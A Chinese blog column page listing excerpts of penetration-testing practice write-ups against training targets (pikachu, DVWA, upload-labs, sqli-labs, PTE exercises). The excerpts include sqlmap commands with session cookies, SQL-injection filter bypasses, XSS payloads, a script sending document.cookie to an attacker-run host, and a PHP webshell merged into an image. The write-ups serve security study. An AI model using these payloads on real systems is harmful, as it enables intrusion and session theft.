练习
文章平均质量分 74
haoaaao
建设美丽中国
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
pte练习——综合题10.1.11.83
一、10.1.11.831、nmap扫描一下开放端口,排除掉那些常见特殊端口,尝试一下陌生端口,如125端口,进入登录页面:2、尝试burp抓包,没有抓到,说明该登录页面属于前端网页,没有经过服务器;3、用burp直接扫描目录: (1)首先随便进入一个目录,用burp抓包; (2)设置目录为变量,传目录字典暴破。(注意取消最后的url编码,否则/会被编码,无法暴破)...原创 2022-02-24 19:11:41 · 4866 阅读 · 0 评论 -
pte练习——34051(sql)、34061、34214(代码)、34223(文件包含)、34224(xss)、34234(代码)、34415(xss)
一、34051(sql注入)1、输入用户名和特殊字符密码,发现个别字符被屏蔽,说明用户密码中存在sql注入漏洞。 2、想办法闭合语句,发现关键词大多数被屏蔽,尝试用or闭合,or被屏蔽,使用多写或大写可以绕过: 二、34061(sql注入)1、题中给出查询语句,想办法闭合语句:2、使用sql语句查询: (1)order by测试列数为7: (2)union select联...原创 2022-02-10 16:33:25 · 3207 阅读 · 0 评论 -
pte练习题(34071-34075)
一、34071(sql注入)1、get型,首先想办法闭合语句:(1)从代码中可以看出,--、#及其url转义均被屏蔽 (2)前面加1',结尾加or '1, 来闭合语句: 2、语句成功闭合,使用sqlmap进行sql注入:(1)查询数据库:python sqlmap.py -u "http://ip:34071/start/index.php?uuid=1'or1'" --db...原创 2022-02-08 17:19:59 · 1937 阅读 · 2 评论 -
pte练习题(34041-34045)
一、34041(sql注入????????)1、题目给出要读取文件的目录2、进入题目,已经给出查询语句,加')%23将语句闭合:3、order by测试列数,发现空格被屏蔽,使用/**/绕过: 4列可以正常执行,5列执行出错,说明数据库有4列;4、使用联合查询(注意使用联合查询,前面的值要为-1): (1)union select 1,2,3,4,发现union被替换为/**/,双写绕过: (2)发现1234都是可以注入的位置,随便找一个...原创 2022-02-04 19:48:39 · 1845 阅读 · 0 评论 -
pte练习题(34031-34035)
一、34031(二次sql注入)和34021一毛一样1、注册特殊字符用户,比如'"*--#,注册成功,说明注册登录页面没有sql注入漏洞;进入后重置密码,不成功,说明有sql注入漏洞,重置密码没有重新输入用户名的操作,说明重置密码的updata语句中,引入了注册的username,导致语句被注释;2、注册admin'#+随便一个字符,比如admin'#1,设置密码,进入后重置密码,成功,说明单引号可以将updata语句闭合,#后面字符均无用,也就是成功将admin用户的密码重置;3、使用ad原创 2022-02-04 17:19:41 · 1704 阅读 · 0 评论 -
pte练习题(34021-34025)
一、34021(二阶sql注入)1、测试:(1)用正常用户名密码注册,成功,无漏洞,修改密码,成功(2)用特殊字符注册,成功,无漏洞,修改密码,不成功,存在sql漏洞。说明前期注册的用户名会影响后面密码修改部分的数据:数据插入语句:insert xxx value (username,password) //无漏洞重置密码:updata xxx value (新密码) where username=()/...原创 2022-02-04 14:13:27 · 2257 阅读 · 0 评论 -
pte练习题(34011-34015)
一、34011(sql注入)1、首先测试一下该网站可能会有些什么漏洞:(1)用乱码注册用户可以成功,但无法发表文章;说明用户名会影响数据插入;(2)正常账号的发表正常内容成功,但发表特殊符号失败,说明数据插入的时候存在sql注入漏洞;(3)用户a的信息,用户b不能查看;结合第(1)条说明数据插入语句中包含用户名信息。2、数据库插入函数:insert value(' ', ' ', ' ')该函数至少有三个参数,将语句闭合即可,但无法确定输入内容是第几个参数,.原创 2022-02-03 14:57:04 · 6167 阅读 · 0 评论 -
pikachu练习——sql注入
一、字符型注入(get)(1)随便输入name,获取url:因pikachu登录需要用户名及密码,所以查询网页cookie绕过:(2)使用sqlmap查找该网站数据库:python sqlmap.py -u "http://127.0.0.1:8083/vul/sqli/sqli_str.php?name=123&submit=查询" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" --dbs --原创 2022-01-30 17:29:27 · 2292 阅读 · 0 评论 -
DVWA练习——sql注入
一、sql injection(1)由于dvwa需要登录,因此直接无法获取数据库的内容,则需要在sql注入语句中添加网站的cookie以绕过登录获取cookie:(2)sqlmap获取数据库:python sqlmap.py -u "http://127.0.0.1:8082/vulnerabilities/sqli/?id=4354&Submit=Submit" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; securit..原创 2022-01-30 16:51:34 · 2755 阅读 · 0 评论 -
sqli-labs练习——sql注入
/***环境搭建优快云https://mp.youkuaiyun.com/mp_blog/creation/editor/122668696***/一、less-1(1)题目让提交一个参数,没说是get参数还是post参数,那先尝试一下get参数(2)首先触发网站的异常,如果触发异常了,说明网站存在sql注入漏洞,甚至可以通过报错信息,获取数据库的一些信息。1)可以通过特殊字符进行尝试 (空格、#号需要url转义)报如下异常...原创 2022-01-29 20:31:09 · 1550 阅读 · 0 评论 -
pikachu练习——ssrf(服务器端请求伪造)
/***其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制。导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。***/一、ssrf(url)//题目有一些问题,需要手动拼接一下url的8083端口就是可以访问一些之前无法访问的文件(和文件包含差不多,只是目的不是攻击服务器)...原创 2022-01-27 14:13:39 · 725 阅读 · 0 评论 -
DVWA练习——CSRF(跨站请求伪造)
一、难度:low(1)随便点击一下change,网页上面已经显示出了修改信息的url值。(2)直接修改即可:回车,信息已经修改:新密码测试成功:(1)点击html打开,然后验证,发现失败将html文件放在vul同级目录然后打开,验证失败:抓包可以看到这里的链接是close将html文件改为ip.html验证成功(2) 失败原因:/***CSRF ————(二)绕过http_referer来源核对_Benjiamin.原创 2022-01-27 13:32:30 · 601 阅读 · 0 评论 -
pikachu——CSRF(跨站请求伪造)攻击
/***csrf攻击步骤:(1)目标用户登录login受信任网站a,并在本地生成cookie;(2)目标用户在不登出logout a的情况下,访问恶意网站b,或者恶意链接url,其目的就是想让目标用户在自己电脑上执行恶意代码。****/一、csrf(get)有提前设置好的用户信息:lili 123456,登录后可以看到信息,现在假设lili为受害者,使用csrf攻击修改lili的个人信息。1、法一:(1)登录lili,修改个人信息,然后burpsuite抓...原创 2022-01-27 13:03:29 · 474 阅读 · 0 评论 -
pikachu练习——file inclusion(文件包含漏洞)
一、file inclusion(local)????????1、在文件上传漏洞的getimagesize中上传拼接的111shell2.jpg文件(1)这是文件url路径http://192.168.1.32:8083/vul/unsafeupload/getimagesize.php(2)这是题中所给图片保存路径:uploads/2022/01/25/63414861efd573ba090720236716.jpg(3)将二者拼接http://192.168.1.32:8原创 2022-01-26 14:04:06 · 1459 阅读 · 0 评论 -
dvwa练习——file upload and inclusion(文件上传及包含)
一、 file upload难度高级➕inclusion难度低级1、使用终端拼接php木马文件和jpg文件为111shell2.jpg2、file upload上传文件3、进入file inclusion。 (1)inclusion的url地址为:http://192.168.1.32:8082/vulnerabilities/fi/?page=include.php (2)上传成功的拼接文件题目所给地址为:../../hacka...原创 2022-01-25 20:20:11 · 335 阅读 · 0 评论 -
upload labs——14~17(文件包含漏洞)
一、pass14(1)思路:1)查看源代码发现代码会检查上传文件头的前两个字节,只有符合图片的头才会上传2)考虑将图片和php文件拼接起来,绕过检查(2)步骤1)利用cmd生成将.php和.jpg文件合并生成包含php木马的.jpg文件2)上传并进行验证 上传成功 验证:利用题目所给存在文件上传漏洞的网页进行测试。 复制该网页网址在hackbar中验...原创 2022-01-25 18:20:11 · 685 阅读 · 0 评论 -
upload labs练习(文件上传漏洞靶场)
/**upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共21关,每一关都包含着不同上传方式。**/一、环境1)停掉桌面的phpstudy服务2)打开c盘目录下target- upload文件夹,点modify_path.bat文件3)点该目录下的phpstudy.exe启动,网页访问127.0.0.1二、pass01火狐js屏蔽,上传,hackbar验证三、pass02burp原创 2022-01-25 16:00:09 · 1324 阅读 · 1 评论 -
记各靶场及工具
一、靶场1、pikachu//桌面phpstudy启动—>8083端口多种类型结合的靶场,中文2、dvwa//桌面phpstudy启动—>8082端口经典多类型结合靶场,难度可调low、midum、high三级,英文3、xss.haozi.me专门的xss练习平台,共19关,中文4、upload labs//停掉并推出桌面phpstudy,进入upload文件夹运行.bat文件,运行该文件内phpstudy,访问127.0.0.1专门的上传漏洞靶场,2原创 2022-01-24 15:47:51 · 620 阅读 · 0 评论 -
pikachu练习——unsafe fileupload
一、click checkjs扩展进行屏蔽,然后上传可执行文件根据提示的文件保存路径进入可查看到该网站的php信息二、mime type(1)首先分别上传可通过的图片格式文件,并对其进行抓包后让forward;上传不可通过的脚本文件php,对其抓包后forward。(2)查看抓到的两个包的文件信息,查找可通过的文件和不可通过文件的文件格式差别。看到一个是image/jpeg ,一个是application/octet-stream(3)再次上传可执行脚原创 2022-01-24 15:31:26 · 306 阅读 · 0 评论 -
xss.haozi.me
一、0x00<script>alert(1);</script>二、0x01想办法闭合<textarea></textarea><script>alert(1);</script>三、0x02闭合input"><script>alert(1);</script>四、0x03server code显示将()括号转义为空,因此用反引号代替括号<script&原创 2022-01-23 19:14:55 · 743 阅读 · 0 评论 -
DVWA练习——XSS
一、xss(reflected)(1)难度:low提交代码(2)难度:mediuma、查看源代码,发现将<script>标签替换置空b、发现将某个东西替换成空,首先想到“双写绕过”的办法/****双写绕过eg:构造<sc<script>ript>,当<script>被过滤掉时,剩下的字符自动拼接在一起,就形成了<script> ****/(3)、难度:high查看源码,发现对多个...原创 2022-01-22 16:37:12 · 478 阅读 · 0 评论 -
pikachu练习——XSS
/****XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理:输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;输出转义:根据输出点的位置对输出到前端的内容进行适当转义;一般XSS可以分为如下几种常见类型:1.反射性XSS;...原创 2022-01-22 16:36:54 · 1114 阅读 · 0 评论 -
xss练习——获取cookie绕过登录名密码
1、脚本实现功能:将被攻击方cookie发送至黑客/*****document.write:写入脚本document.cookie:获取被攻击方cookiimg src:get请求返回脚本内容****/<script>document.write('<img src="http://192.168.1.32:8023/?'+document.cookie+'"/>')</script>...原创 2022-01-22 14:46:08 · 1099 阅读 · 0 评论 -
pikachu练习——暴破
一、表单的爆破1、burpsuite抓包2、发送到intruder(1)设置变量个数,不需要的变量claer掉(2)设置爆破字典以及爆破速度,进行爆破。(注意长度不一致的数据,可能是正确的密码)二、验证码绕过(on client)1、抓包,发现验证码正确时抓到包,验证码错误时抓不到包,说明该验证码识别未通过服务器。2、法一:火狐自带js插件进行屏蔽。 法二:1)查看页面源代码,找到验证码模块查看代码。2)fn➕f12在控制台中模仿页面源代码格式重写验证码模块代码...原创 2022-01-21 20:39:42 · 1092 阅读 · 0 评论
分享